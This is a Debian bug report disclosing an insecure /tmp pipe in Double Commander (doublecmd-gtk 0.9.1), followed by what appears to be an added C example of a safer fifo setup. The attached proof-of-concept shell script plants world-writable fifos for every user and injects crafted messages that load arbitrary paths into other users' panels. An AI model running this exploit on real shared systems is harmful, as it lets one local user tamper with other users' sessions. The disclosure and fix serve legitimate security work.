[Pkg-pascal-devel] Bug#926223: doublecmd-gtk: insecure use of /tmp

Jakub Wilk jwilk at jwilk.net
Tue Apr 2 10:32:31 BST 2019


Package: doublecmd-gtk
Version: 0.9.1-1
Tags: security

Double Commander uses /tmp/doublecmd--<uid> for communication, even when 
this file is owned by another user.

A local attacker could exploit this to load paths into other users' 
panels. Proof-of-concept exploit is attached.

Please move the communication pipe out of /tmp.


-- System Information:
Architecture: i386

-- 
Jakub Wilk
-------------- next part --------------
#!/bin/sh
set -e -u
cd /tmp
getent passwd | while IFS=: read -r user _ uid _
do
    fifo="doublecmd--$uid"
    rm -f "$fifo" || true  # maybe stale fifo from the previous exploit run?
    if ! mkfifo -m 666 "$fifo"
    then
        printf 'Failed to mount the exploit against %s; Maybe try again later?\n' "$user"
        continue
    fi
done
while true
do
    for uid in $(ps --no-headers -C doublecmd -o uid)
    do
        sleep 1
        fifo="doublecmd--$uid"
        path=$(find /bin /sbin /usr/bin /usr/sbin /usr/games | shuf -n 1)
        len=${#path}
        pad=$((1024-len))
        {
            printf '\1\5\20\0\0\5\20\0\0\0\1%02050d' | tr '0' '\0'
            printf '%s' "$path"
            printf "%0${pad}d\1%01024d" | tr '0' '\0'
        } > "$fifo"
    done
    sleep 1
done
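As a defensive counterpart to the report, here is an added example (not Double Commander's own code): hypothetical C helpers that build the pipe path under a caller-supplied private directory such as $XDG_RUNTIME_DIR instead of /tmp, and refuse to read from a fifo that is not owned by the current user or has group/other permission bits, which is exactly what the attached PoC's `mkfifo -m 666` produces.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: build the pipe path under a directory the user owns
 * (e.g. $XDG_RUNTIME_DIR), not world-writable /tmp. Returns 0 on success. */
int doublecmd_pipe_path(const char *dir, uid_t uid, char *out, size_t outlen) {
    if (dir == NULL || *dir == '\0') return -1;
    int n = snprintf(out, outlen, "%s/doublecmd--%lu", dir, (unsigned long)uid);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Open the fifo for reading only if it is a fifo owned by this user with no
 * group/other permission bits. Returns an fd, or -1 (errno EPERM if refused). */
int open_own_fifo(const char *path) {
    if (mkfifo(path, 0600) != 0 && errno != EEXIST) return -1;
    /* O_NOFOLLOW rejects a symlink planted at the path; O_NONBLOCK keeps the
     * open from blocking until a writer connects. */
    int fd = open(path, O_RDONLY | O_NONBLOCK | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    struct stat st;
    /* fstat the open fd, not stat on the path: no check-then-use window. */
    if (fstat(fd, &st) != 0 || !S_ISFIFO(st.st_mode) || st.st_uid != getuid()
        || (st.st_mode & (S_IRWXG | S_IRWXO)) != 0) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-check in a private temp dir: a fresh 0600 fifo is accepted; the same
 * fifo chmod'ed to 0666 (what the PoC's mkfifo -m 666 creates) is refused.
 * Returns 1 when both outcomes match, 0 otherwise. */
int demo_fifo_checks(void) {
    char dir[] = "/tmp/dcfifo-XXXXXX", path[64];
    if (mkdtemp(dir) == NULL) return 0;
    int ok = doublecmd_pipe_path(dir, getuid(), path, sizeof path) == 0;
    int fd = ok ? open_own_fifo(path) : -1;
    ok = ok && fd >= 0;
    if (fd >= 0) close(fd);
    ok = ok && chmod(path, 0666) == 0 && open_own_fifo(path) == -1;
    unlink(path);
    rmdir(dir);
    return ok;
}
```

The same fstat-based owner and mode check applies when the pipe must stay in a shared directory; the private directory only removes the opportunity for another user to pre-create the path.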

